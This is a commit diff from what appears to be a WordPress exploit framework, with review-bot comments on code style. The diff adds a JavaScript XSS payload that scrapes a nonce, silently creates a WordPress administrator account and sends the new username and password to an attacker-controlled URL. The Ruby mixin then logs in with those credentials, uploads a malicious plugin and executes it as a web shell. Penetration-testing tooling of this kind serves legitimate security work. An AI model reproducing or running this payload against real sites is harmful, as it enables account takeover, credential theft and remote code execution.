
Commit b0f3e87

Cleanup Wpxf::WordPress::Xss mixin
1 parent f2a53b5 commit b0f3e87


2 files changed

+52
-40
lines changed


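--- /dev/null
+++ b/data/js/create_wp_user.js
@@ -0,0 +1,24 @@
+var create_user = function () {
+var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
+var data = new FormData();
+
+data.append('action', 'createuser');
+data.append('_wpnonce_create-user', nonce);
+data.append('_wp_http_referer', '$wordpress_url_new_user');
+data.append('user_login', '$username');
+data.append('email', '$email');
+data.append('pass1', '$password');
+data.append('pass2', '$password');
+data.append('role', 'administrator');
+
+postInfo("$wordpress_url_new_user", data, function () {
+var a = document.createElement("script");
+a.setAttribute("src", "$xss_url?u=$username&p=$password");
+document.head.appendChild(a);
+});
+};
+
+ajax_download({
+path: "$wordpress_url_new_user",
+cb: create_user
+});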
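Review bot: The template has no header comment saying which placeholders it expects, nor that `postInfo` and `ajax_download` are not defined here but come from the `js_ajax_post`/`js_ajax_download` snippets that `wordpress_js_create_user` prepends on the Ruby side, so the file cannot be read or linted on its own. Suggest a top-of-file comment along the lines of `// Template consumed by Wpxf::WordPress::Xss#wordpress_js_create_user: $wordpress_url_new_user, $username, $password, $email and $xss_url are replaced by read_js_file_with_vars; postInfo/ajax_download are supplied by the js_ajax_* snippets emitted before this file.` The placeholders are bare `$`-prefixed tokens with no closing delimiter, so a future placeholder that is a prefix of another one would be substituted incorrectly by the single-pass alternation; that constraint is worth stating in the same comment.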

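--- a/lib/wpxf/wordpress/xss.rb
+++ b/lib/wpxf/wordpress/xss.rb
@@ -4,9 +4,7 @@
 module Wpxf::WordPress::Xss
 include Wpxf
 include Wpxf::Net::HttpServer
-include Wpxf::WordPress::Login
 include Wpxf::WordPress::Plugin
-
 include ERB::Util
 
 # Initialize a new instance of {Xss}.
@@ -64,38 +62,19 @@ def xss_ascii_encoded_include_script
 # @return [String] a script that will create a new admin user and post the
 # credentials back to {#xss_url}.
 def wordpress_js_create_user
-username = Utility::Text.rand_alpha(6)
-password = Utility::Text.rand_alpha(10)
-
-%Q|
+variables = {
+'$wordpress_url_new_user' => wordpress_url_new_user,
+'$username' => Utility::Text.rand_alpha(6),
+'$password' => Utility::Text.rand_alpha(10),
+'$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
+'$xss_url' => xss_url
+}
+
+%(
 #{js_ajax_download}
 #{js_ajax_post}
-
-var create_user = function () {
-var nonce = this.responseText.match(/id="_wpnonce_create-user" name="_wpnonce_create-user" value="([a-z0-9]+)"/i)[1];
-var data = new FormData();
-
-data.append('action', 'createuser');
-data.append('_wpnonce_create-user', nonce);
-data.append('_wp_http_referer', '#{wordpress_url_new_user}');
-data.append('user_login', '#{username}');
-data.append('email', '#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com');
-data.append('pass1', '#{password}');
-data.append('pass2', '#{password}');
-data.append('role', 'administrator');
-
-postInfo("#{wordpress_url_new_user}", data, function () {
-var a = document.createElement("script");
-a.setAttribute("src", "#{xss_url}?u=#{username}&p=#{password}");
-document.head.appendChild(a);
-});
-};
-
-ajax_download({
-path: "#{wordpress_url_new_user}",
-cb: create_user
-});
-|
+#{read_js_file_with_vars('create_wp_user.js', variables)}
+)
 end
 
 # Default HTTP request handler for XSS modules which will serve the script
@@ -127,21 +106,16 @@ def upload_shell(username, password)
 cookie = authenticate_with_wordpress(username, password)
 return false unless cookie
 
-emit_info 'Uploading payload...'
 plugin_name = Utility::Text.rand_alpha(10)
 payload_name = Utility::Text.rand_alpha(10)
+
+emit_info 'Uploading payload...'
 unless wordpress_upload_payload_plugin(plugin_name, payload_name, cookie)
 emit_error 'Failed to upload the payload'
 return false
 end
 
-payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
-emit_info "Executing the payload at #{payload_url}..."
-res = execute_get_request(url: payload_url)
-
-if res && res.code == 200 && !res.body.strip.empty?
-emit_success "Result: #{res.body}"
-end
+execute_payload(plugin_name, payload_name)
 
 true
 end
@@ -150,4 +124,18 @@ def upload_shell(username, password)
 def xss_shell_success
 @success
 end
+
+private
+
+def execute_payload(plugin_name, payload_name)
+payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+emit_info "Executing the payload at #{payload_url}..."
+res = execute_get_request(url: payload_url)
+emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+end
+
+def read_js_file_with_vars(name, vars)
+matcher = /#{vars.keys.map { |k| Regexp.escape(k) }.join('|')}/
+File.read(File.join(Wpxf.data_directory, 'js', name)).gsub(matcher, vars)
+end
 end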
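Review bot: Dropping `include Wpxf::WordPress::Login` in the first hunk leaves `upload_shell` (third hunk) still calling `authenticate_with_wordpress`, which that mixin presumably provides; unless `Wpxf::WordPress::Plugin` includes Login itself, the method will raise NoMethodError at runtime, so either restore the include or confirm the transitive include before merging. In `read_js_file_with_vars`, `Regexp.union(vars.keys)` is the idiomatic stdlib form of the hand-built alternation and performs the escaping for you: `File.read(File.join(Wpxf.data_directory, 'js', name)).gsub(Regexp.union(vars.keys), vars)`. The two new private helpers also lack the YARD `@param`/`@return` lines the module's public methods carry; `execute_payload` should say that it only emits output and has no meaningful return value, and `read_js_file_with_vars` that `vars` maps literal placeholder strings to their replacement text and that substitution is a single pass, so placeholder names must not be prefixes of one another.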
